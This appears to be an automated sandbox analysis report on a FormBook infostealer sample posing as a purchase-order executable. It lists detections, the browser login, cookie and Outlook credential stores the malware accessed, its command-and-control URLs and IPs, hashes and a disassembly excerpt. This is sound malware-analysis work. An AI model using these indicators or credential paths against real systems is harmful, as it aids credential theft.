Source: RAVCpl64.exe, 00000002.00000000.22357379456.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000002.23285504174.0000000000D90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: RAVCpl64.exe, 00000002.00000000.22357379456.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000002.23285504174.0000000000D90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: 7Program ManagerH

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.PO_62401394_MITech_20250601.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\fc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0.2.PO_62401394_MITech_20250601.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	312 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	312 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO_62401394_MITech_20250601.exe	68%	ReversingLabs	Win32.Infostealer.Tinba
PO_62401394_MITech_20250601.exe	64%	Virustotal		Browse
PO_62401394_MITech_20250601.exe	100%	Avira	TR/Crypt.XPACK.Gen
PO_62401394_MITech_20250601.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.44756.pizza/a59t/?KI7UaA4=4xL6Q7DrxWj99jxey6rPnDV/q35G5BtjNwylhh0vBKzMCs+5V4gzFQEJFVb3bklsevH6tDeLKuQQ/YMUh7acruyVDzvneyJjblLgAmd8GM83k8VjUDwd43s=&KHKq=K3iyk	0%	Avira URL Cloud	safe
http://www.investshares.net/cf9p/	0%	Avira URL Cloud	safe
http://www.grimbo.boats/kxtt/	0%	Avira URL Cloud	safe
http://www.promocao.info/zaz4/?KI7UaA4=a/HH2smDyRg6YmpKuJ/CwFExB84HcD/ERV51bzugA0E0jiOKNXfjwDBbyDsX3ja9PlsooGpF4nQX9l9Mtzddkih80GA487ej2P9P6VRXNWvFWMG3SLWD8ho=&KHKq=K3iyk	0%	Avira URL Cloud	safe
http://www.grimbo.boats/kxtt/?KHKq=K3iyk&KI7UaA4=eC1oD4IhFSd/6jtM+gdYzJfxG74p9Bu5zKGW4KqWLMPitrzcqar0FZdKX10RVuOt75j4smH0EDZzb9gyazsXkw0DXdBvphotLgIy0LjdzSrSQl898rKd/4Q=	0%	Avira URL Cloud	safe
http://www.44756.pizza/a59t/	0%	Avira URL Cloud	safe
http://www.investshares.net/cf9p/?KI7UaA4=tknvN2jlhTuvpXXYKbmDHxfvNfIutDmLNYYXG7/rIeGG9fe7kNXrAZ+6u3EcgYD6CfYKVegcRI1iRuMeH9uFP/TayYjwTZYlDf+E8idq81YEdMFJEoEtWTU=&KHKq=K3iyk	0%	Avira URL Cloud	safe
http://www.lonfor.website/bowc/?KHKq=K3iyk&KI7UaA4=hSFyBF7QNpd6wUow9uow+ol61tLJyNEWjK6IJxkbiJgyDGKURjVOywh5a/1i9fugKQVYW71g1Iqe5QUBl7nO7+58J8zlUP0v8LIzRfWvKIRe9+cNHz16wuE=	0%	Avira URL Cloud	safe
http://www.gayhxi.info/k2i2/?KHKq=K3iyk&KI7UaA4=oYl0YuhK+EfenM8eRymXNBnaKArlDGdWSGf6Q1012MfAC24gU0JLDSHJdRiR078xrhufJIQsd6i55/X9+LeTdG3SQaFYv5Mzf8bAEkK4ob53ijBtuMlH5fk=	100%	Avira URL Cloud	malware
http://www.lonfor.website/bowc/	0%	Avira URL Cloud	safe
http://www.promocao.info/zaz4/	0%	Avira URL Cloud	safe
http://www.investshares.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
promocao.info	84.32.84.32	true	true	unknown
www.grimbo.boats	104.21.18.171	true	true	unknown
www.lonfor.website	199.192.21.169	true	true	unknown
www.gayhxi.info	47.83.1.90	true	true	unknown
www.investshares.net	154.197.162.239	true	true	unknown
zcdn.8383dns.com	134.122.135.48	true	true	unknown
www.promocao.info	unknown	unknown	false	unknown
www.44756.pizza	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.gayhxi.info/k2i2/?KHKq=K3iyk&KI7UaA4=oYl0YuhK+EfenM8eRymXNBnaKArlDGdWSGf6Q1012MfAC24gU0JLDSHJdRiR078xrhufJIQsd6i55/X9+LeTdG3SQaFYv5Mzf8bAEkK4ob53ijBtuMlH5fk=	true	Avira URL Cloud: malware	unknown
http://www.grimbo.boats/kxtt/	true	Avira URL Cloud: safe	unknown
http://www.promocao.info/zaz4/?KI7UaA4=a/HH2smDyRg6YmpKuJ/CwFExB84HcD/ERV51bzugA0E0jiOKNXfjwDBbyDsX3ja9PlsooGpF4nQX9l9Mtzddkih80GA487ej2P9P6VRXNWvFWMG3SLWD8ho=&KHKq=K3iyk	true	Avira URL Cloud: safe	unknown
http://www.lonfor.website/bowc/	true	Avira URL Cloud: safe	unknown
http://www.44756.pizza/a59t/	true	Avira URL Cloud: safe	unknown
http://www.44756.pizza/a59t/?KI7UaA4=4xL6Q7DrxWj99jxey6rPnDV/q35G5BtjNwylhh0vBKzMCs+5V4gzFQEJFVb3bklsevH6tDeLKuQQ/YMUh7acruyVDzvneyJjblLgAmd8GM83k8VjUDwd43s=&KHKq=K3iyk	true	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/kxtt/?KHKq=K3iyk&KI7UaA4=eC1oD4IhFSd/6jtM+gdYzJfxG74p9Bu5zKGW4KqWLMPitrzcqar0FZdKX10RVuOt75j4smH0EDZzb9gyazsXkw0DXdBvphotLgIy0LjdzSrSQl898rKd/4Q=	true	Avira URL Cloud: safe	unknown
http://www.investshares.net/cf9p/?KI7UaA4=tknvN2jlhTuvpXXYKbmDHxfvNfIutDmLNYYXG7/rIeGG9fe7kNXrAZ+6u3EcgYD6CfYKVegcRI1iRuMeH9uFP/TayYjwTZYlDf+E8idq81YEdMFJEoEtWTU=&KHKq=K3iyk	true	Avira URL Cloud: safe	unknown
http://www.lonfor.website/bowc/?KHKq=K3iyk&KI7UaA4=hSFyBF7QNpd6wUow9uow+ol61tLJyNEWjK6IJxkbiJgyDGKURjVOywh5a/1i9fugKQVYW71g1Iqe5QUBl7nO7+58J8zlUP0v8LIzRfWvKIRe9+cNHz16wuE=	true	Avira URL Cloud: safe	unknown
http://www.investshares.net/cf9p/	true	Avira URL Cloud: safe	unknown
http://www.promocao.info/zaz4/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	false		high
https://duckduckgo.com/ac/?q=	17O3k-2I.3.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	fc.exe, 00000003.00000003.22611963148.0000000008345000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp, 17O3k-2I.3.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	17O3k-2I.3.dr	false		high
http://www.investshares.net	RAVCpl64.exe, 00000002.00000002.23288253460.0000000003396000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	fc.exe, 00000003.00000002.23287225942.00000000082D7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
154.197.162.239	www.investshares.net	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
104.21.18.171	www.grimbo.boats	United States	13335	CLOUDFLARENETUS	true
199.192.21.169	www.lonfor.website	United States	22612	NAMECHEAP-NETUS	true
47.83.1.90	www.gayhxi.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
84.32.84.32	promocao.info	Lithuania	33922	NTT-LT-ASLT	true
134.122.135.48	zcdn.8383dns.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585196
Start date and time:	2025-01-07 10:05:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO_62401394_MITech_20250601.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@6/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 16 Number of non-executed functions: 354
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
04:09:10	API Interceptor	2600088x Sleep call for process: fc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
154.197.162.239	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.investshares.net/cf9p/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.investshares.net/cf9p/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.investshares.net/cf9p/
104.21.18.171	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Get hash	malicious	FormBook	Browse	www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
199.192.21.169	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	www.sesanu.xyz/rf25/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	inv#12180.exe	Get hash	malicious	FormBook	Browse	www.lonfor.website/bowc/
	URGENT REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	www.technectar.top/ghvt/
	NU1aAbSmCr.exe	Get hash	malicious	FormBook	Browse	www.tophm.xyz/30rz/
	lPX6PixV4t.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
	Z6s208B9QX.exe	Get hash	malicious	FormBook	Browse	www.zenscape.top/d8cw/
	8mmZ7Bkoj1.exe	Get hash	malicious	FormBook	Browse	www.cenfresh.life/6iok/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.grimbo.boats	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	inv#12180.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
www.investshares.net	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
www.lonfor.website	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	inv#12180.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
www.gayhxi.info	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	inv#12180.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	47.83.1.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://link.edgepilot.com/s/1b4c2fcb/nQHbBC0YQUOfuyi9X74dgg?u=https://url.usb.m.mimecastprotect.com/s/sZGCCm7Wwmt5092LsBiWSRG4Fz?domain=link.edgepilot.com	Get hash	malicious	Unknown	Browse	104.18.69.40
	https://bawarq.org/r.php?id=YoExsdlTj9ej3sIxs1X7aZn3DzYWS8OQ2	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://d3sdeiz39xdvhy.cloudfront.net	Get hash	malicious	Unknown	Browse	172.67.136.18
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	104.22.74.216
	https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	104.22.16.141
	http://ib.adnxs.com/getuid?https%3a%2f%2fDaiichi-sankyo.uronfecit.ru/Hlnz62kK/#YWxleGFuZGVyLmJsYXp5Y3pla0BkYWlpY2hpLXNhbmt5by5kZQ==	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://share.hsforms.com/1Wcb3a5ziS0yUfGwanfFbLgsw4gs	Get hash	malicious	Unknown	Browse	104.18.142.119
	msimg32.dll	Get hash	malicious	RHADAMANTHYS	Browse	162.159.200.123
	https://check.qlkwr.com/awjsx.captcha?u=8565c17d-9686-4e17-ae60-902c6d4876be	Get hash	malicious	Unknown	Browse	188.114.96.3
COMING-ASABCDEGROUPCOMPANYLIMITEDHK	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	armv6l.elf	Get hash	malicious	Mirai	Browse	154.197.141.202
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	inv#12180.exe	Get hash	malicious	FormBook	Browse	154.197.162.239
	vcimanagement.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.241.105.229
	vcimanagement.armv5l.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.241.72.39
	vcimanagement.sparc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.23.164
	vcimanagement.sh4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.224.192.71
	vcimanagement.m68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.7.48
	vcimanagement.i686.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.250.23.181
NAMECHEAP-NETUS	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	68.65.122.71
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyql	Get hash	malicious	HTMLPhisher	Browse	63.250.38.199
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	DUD6CqQ1Uj.doc	Get hash	malicious	Unknown	Browse	192.64.119.42
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	http://keywestlending.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.219.248.99
	inv#12180.exe	Get hash	malicious	FormBook	Browse	199.192.21.169
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	37.61.233.171

Process:	C:\Windows\SysWOW64\fc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.1142956103012707
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
MD5:	E3F9717F45BF5FFD0A761794A10A5BB5
SHA1:	EBD823E350F725F29A7DE7971CD35D8C9A5616CC
SHA-256:	D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
SHA-512:	F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.962167138824115
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO_62401394_MITech_20250601.exe
File size:	298'496 bytes
MD5:	b01928cd0befa10c1c43b3339e03bd8d
SHA1:	4ad60b0dc750db8e158eeb6c020638f476c3298a
SHA256:	fb2a72faafc798d6d34f0a05f3603a36a66b684967e325051c8913ef0e118fa0
SHA512:	fc6835806cdbf60b231680c085a81c9ec766c3aec98b9864525adb2b8d0a62edb83dcefe5e329fa0ae02716986a77921ce7bf13e3d2b698ac9f24b0c37d2c342
SSDEEP:	6144:F8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro+Z:F/dhQJqiOKsPDOZLGeDk3r
TLSH:	8554221A5F26B206C1FD2973355F0B42B671473DBE592B21B4992CA29D90CBF5EC03E1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...$...............p....@................

File Icon


Icon Hash:	246d0d17b3315458

Static PE Info

General

Entrypoint:	0x401580
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
push ebp
push esp
pop ebp
sub esp, 00000424h
push ebx
push esi
push edi
push 0000040Ch
lea eax, dword ptr [ebp-00000420h]
push 00000000h
push eax
mov dword ptr [ebp-00000424h], 00000000h
call 00007FD43C697ADCh
add esp, 0Ch
sub ecx, ecx
sub edi, edi
sub esi, esi
mov dword ptr [ebp-14h], 00000054h
mov dword ptr [ebp-10h], 00003B15h
mov dword ptr [ebp-0Ch], 00001B0Dh
mov dword ptr [ebp-08h], 00004BD2h
nop
nop
inc ecx
push ecx
pop eax
and eax, 80000007h
jns 00007FD43C695EE7h
dec eax
or eax, FFFFFFF8h
inc eax
jne 00007FD43C695EE4h
add ecx, ecx
cmp ecx, 00000CB4h
jl 00007FD43C695EC7h
mov ecx, 00006ACDh
mov eax, 92492493h
imul ecx
add edx, ecx
sar edx, 05h
push edx
pop ecx
shr ecx, 1Fh
add ecx, edx
jne 00007FD43C695ECDh
mov eax, 00001819h
nop
push 0000001Bh
nop
pop edx
mov ecx, 000000C2h
cmp ecx, edx
cmovl ecx, edx
dec eax
jne 00007FD43C695EDAh
mov ecx, 00001F5Ah
mov eax, 82082083h
imul ecx
add edx, ecx
sar edx, 06h
push edx
pop ecx
shr ecx, 1Fh
add ecx, edx
jne 00007FD43C695ECDh
call 00007FD43C697D3Ah
mov dword ptr [ebp-5Ch], eax
mov edi, edi
inc edi
mov eax, 55555556h
imul edi

Rich Headers

Programming Language:

[C++] VS2012 build 50727
[ASM] VS2012 build 50727
[LNK] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x2358	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x45694	0x45800	f420239267b39e40092fd0df5f1700e0	False	0.9885622751798561	data	7.995271347901756	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x2358	0x2400	3f5572a8563784d4bacd9fd5cb4b3964	False	0.9434678819444444	data	7.754725785414912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x470b4	0x228d	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9710570944036179
RT_GROUP_ICON	0x49344	0x14	data			1.05

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
